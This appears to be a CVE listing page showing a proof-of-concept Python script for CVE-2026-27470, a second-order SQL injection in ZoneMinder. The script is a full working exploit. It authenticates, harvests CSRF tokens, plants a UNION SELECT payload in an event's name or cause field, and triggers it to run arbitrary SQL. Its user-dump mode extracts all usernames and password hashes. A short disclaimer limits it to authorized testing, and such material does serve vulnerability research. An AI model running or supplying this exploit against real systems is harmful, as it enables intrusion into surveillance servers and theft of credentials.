4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2026-27470 - ZoneMinder Second-Order SQL Injection PoC
=============================================================
Affected versions : <= 1.36.37 and 1.37.61 - 1.38.0
Fixed in          : 1.36.38 / 1.38.1
Vulnerable file   : web/ajax/status.php -> getNearEvents()

LEGAL DISCLAIMER:
This tool is for educational and authorized security research purposes only.
Do not use against systems you do not own or have explicit written permission to test.

Usage:
  python3 poc.py -t http://10.10.10.10 -u admin -p password
  python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"
  python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users
"""

import argparse
import re
import sys
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


BANNER = """
╔══════════════════════════════════════════════════════════╗
║   CVE-2026-27470 — ZoneMinder Second-Order SQLi PoC     ║
║   CVSS 8.8 | Authenticated | Events Permission           ║
╚══════════════════════════════════════════════════════════╝
"""


def get_csrf_token(session, target):
    """Extract __csrf_magic token from the page."""
    resp = session.get(f"{target}/", verify=False, allow_redirects=True)
    m = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp.text)
    if m:
        return m.group(1)
    m2 = re.search(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']', resp.text)
    if m2:
        return m2.group(1)
    return None


def login(session, target, username, password):
    """
    Authenticate to ZoneMinder and retrieve session cookie + CSRF token.
    If ZM_OPT_USE_AUTH=0, authentication is skipped and only the session is initialized.
    """
    # Load the root page to initialize the session and grab the CSRF token
    resp = session.get(f"{target}/", verify=False, allow_redirects=True)

    # Extract CSRF token
    csrf = None
    m = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp.text)
    if m:
        csrf = m.group(1)
    if not csrf:
        m2 = re.search(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']', resp.text)
        if m2:
            csrf = m2.group(1)

    session._zm_csrf = csrf  # Store for later use

    # If auth is disabled, ZoneMinder redirects to the privacy page — session is ready
    if "privacy" in resp.url:
        print("[*] ZM_OPT_USE_AUTH=0 detected — auth disabled, session ready.")
        return True

    # Auth is enabled — send login POST
    data = {
        "view": "login",
        "action": "login",
        "username": username,
        "password": password,
    }
    if csrf:
        data["__csrf_magic"] = csrf

    resp2 = session.post(f"{target}/index.php", data=data, verify=False, allow_redirects=True)

    # Refresh CSRF token after login
    m3 = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp2.text)
    if m3:
        session._zm_csrf = m3.group(1)

    if "logout" in resp2.text.lower() or "console" in resp2.url:
        return True
    if resp2.status_code in (200, 302):
        resp3 = session.get(f"{target}/index.php?view=console", verify=False, allow_redirects=True)
        if resp3.status_code == 200 and "login" not in resp3.url:
            return True
    return False


def get_event_id(session, target):
    """Retrieve any available event ID via the ZoneMinder status API."""
    url = f"{target}/index.php"
    params = {
        "request": "status",
        "entity": "events",
        "sort_field": "Id",
        "sort_asc": "1",
        "limit": "1",
    }
    resp = session.get(url, params=params, verify=False)
    try:
        data = resp.json()
        events = data.get("results", [])
        if events:
            return events[0].get("Id") or events[0].get("id")
    except Exception:
        pass
    return None


def inject_payload(session, target, event_id, payload, field="Name"):
    """
    Phase 1: Write the malicious payload into the event Name or Cause field.
    ZoneMinder uses a parameterized query here — the payload is stored safely.
    """
    url = f"{target}/index.php"
    csrf = getattr(session, '_zm_csrf', None)

    if field == "Name":
        data = {
            "request": "event",
            "action": "rename",
            "id": event_id,
            "eventName": payload,
        }
    else:  # Cause
        data = {
            "request": "event",
            "action": "edit",
            "id": event_id,
            "newEvent[Cause]": payload,
            "newEvent[Notes]": "poc",
        }

    if csrf:
        data["__csrf_magic"] = csrf

    resp = session.post(url, data=data, verify=False)
    return resp.status_code == 200


def trigger_sqli(session, target, event_id, field="Name"):
    """
    Phase 2: Trigger second-order injection via getNearEvents().
    The stored payload is read from the DB and concatenated unsafely into SQL.
    """
    url = f"{target}/index.php"
    params = {
        "request": "status",
        "entity": "nearevents",
        "id": event_id,
        "sort_field": field,
        "sort_asc": "1",
    }
    resp = session.get(url, params=params, verify=False)
    return resp


def restore_event_name(session, target, event_id, original_name="Event"):
    """Restore the event name to its original value after exploitation."""
    url = f"{target}/index.php"
    csrf = getattr(session, '_zm_csrf', None)
    data = {
        "request": "event",
        "action": "rename",
        "id": event_id,
        "eventName": original_name,
    }
    if csrf:
        data["__csrf_magic"] = csrf
    session.post(url, data=data, verify=False)


def run_exploit(target, username, password, sql_query, field="Name", restore=True, manual_event_id=None):
    session = requests.Session()
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"
    })

    print(f"\n[*] Target  : {target}")
    print(f"[*] User    : {username}")
    print(f"[*] Query   : {sql_query}\n")

    # Step 1 — Authenticate
    print("[*] Logging in...")
    if not login(session, target, username, password):
        print("[-] Login failed. Check credentials.")
        sys.exit(1)
    print("[+] Session established.")

    # Step 2 — Get event ID
    if manual_event_id:
        event_id = manual_event_id
        print(f"[+] Event ID (manual): {event_id}")
    else:
        print("[*] Looking for an event ID...")
        event_id = get_event_id(session, target)
        if not event_id:
            print("[-] No events found. Specify one manually with --event-id.")
            sys.exit(1)
        print(f"[+] Event ID: {event_id}")

    # Step 3 — Build UNION-based payload
    # Events.Name is varchar(64) — keep payloads under 63 characters
    # UNION SELECT requires 2 columns to match (Id, StartDateTime)
    union_payload = f"' UNION SELECT ({sql_query}),NULL-- -"

    print(f"[*] Injecting payload into '{field}' field...")
    if not inject_payload(session, target, event_id, union_payload, field=field):
        print("[-] Failed to write payload. Check permissions.")
        sys.exit(1)
    print("[+] Payload stored via parameterized query — looks clean in the DB.")

    # Step 4 — Trigger second-order injection
    print("[*] Triggering second-order injection...")
    resp = trigger_sqli(session, target, event_id, field=field)

    print(f"[*] HTTP {resp.status_code}")

    result = None
    try:
        data = resp.json()

        # Real ZoneMinder response: {"nearevents": {"NextEventId": "<RESULT>"}}
        nearevents = data.get("nearevents", {})
        if nearevents:
            result = (nearevents.get("NextEventId")
                      or nearevents.get("PrevEventId")
                      or nearevents.get("NextEventStartTime"))

        # Fallback: {"results": [...]}
        if not result:
            results = data.get("results", data.get("data", []))
            if results:
                result = results[0].get("Id") or results[0].get("StartDateTime")

        if not result:
            result = str(data)
    except Exception:
        result = resp.text[:500]

    # Step 5 — Cleanup
    if restore:
        restore_event_name(session, target, event_id)
        print("[*] Event name restored.")

    return result


def main():
    print(BANNER)
    parser = argparse.ArgumentParser(
        description="CVE-2026-27470 — ZoneMinder Second-Order SQL Injection PoC"
    )
    parser.add_argument("-t", "--target",    required=True, help="Target URL (e.g. http://10.10.10.10)")
    parser.add_argument("-u", "--username",  required=True, help="ZoneMinder username")
    parser.add_argument("-p", "--password",  required=True, help="ZoneMinder password")
    parser.add_argument("--event-id",        type=int,      help="Event ID to use as injection carrier")
    parser.add_argument("--field",           default="Name", choices=["Name", "Cause"],
                                             help="Injection field (default: Name)")
    parser.add_argument("--query",           default="SELECT VERSION()",
                                             help="SQL query to execute")
    parser.add_argument("--dump-users",      action="store_true",
                                             help="Dump all usernames and password hashes")
    parser.add_argument("--no-restore",      action="store_true",
                                             help="Do not restore the event name after exploitation")

    args = parser.parse_args()
    target = args.target.rstrip("/")
    eid = args.event_id

    if args.dump_users:
        print("[*] Mode: User dump")

        count_result = run_exploit(
            target, args.username, args.password,
            "SELECT COUNT(*) FROM Users",
            field=args.field,
            restore=not args.no_restore,
            manual_event_id=eid
        )
        print(f"\n[+] User count: {count_result}\n")

        # Events.Name is varchar(64) — fetch username and hash separately to stay within limit
        for i in range(10):
            uname = run_exploit(
                target, args.username, args.password,
                f"SELECT Username FROM Users LIMIT {i},1",
                field=args.field, restore=not args.no_restore, manual_event_id=eid
            )
            # Empty result means no more users
            uname_str = str(uname) if uname else ""
            if not uname_str or uname_str in ("None", "1", "") or "{" in uname_str:
                break
            passwd = run_exploit(
                target, args.username, args.password,
                f"SELECT Password FROM Users LIMIT {i},1",
                field=args.field, restore=not args.no_restore, manual_event_id=eid
            )
            print(f"[+] User {i+1}: {uname}:{passwd}")
    else:
        result = run_exploit(
            target, args.username, args.password,
            args.query,
            field=args.field,
            restore=not args.no_restore,
            manual_event_id=eid
        )
        print(f"\n[+] Result: {result}\n")


if __name__ == "__main__":
    main()